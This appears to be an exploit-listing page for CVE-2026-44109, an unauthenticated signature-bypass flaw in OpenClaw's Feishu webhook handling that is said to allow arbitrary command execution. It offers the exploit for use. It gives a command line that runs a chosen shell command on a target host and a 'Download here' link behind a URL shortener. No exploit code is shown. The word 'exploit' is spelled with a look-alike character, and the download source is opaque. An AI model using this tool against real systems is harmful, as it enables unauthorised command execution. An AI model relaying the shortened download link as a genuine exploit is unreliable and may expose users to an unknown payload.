Share
## https://sploitus.com/exploit?id=25B8C5F2-34F9-5151-B7D6-CFD6A266F185
# CVE-2026-44109

## Overview
OpenClaw versions prior to 2026.4.15 are vulnerable to an exploitation issue that permits unauthenticated requests to bypass Feishu webhook and card-action validation.

## Details
- **CVE ID**: [CVE-2026-44109](https://nvd.nist.gov/vuln/detail/CVE-2026-44109)
- **Discovered**: 2026-05-06
- **Published**: 2026-05-06

## Vulnerability Description
This vulnerability arises due to inadequate encryptKey configuration and empty callback tokens, which allow attackers to circumvent signature verification and replay protection measures. As a result, malicious actors can execute arbitrary commands within the system, posing significant security risks.
## Running

To run explоit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

### [Download here](https://tinyurl.com/bp7p986b)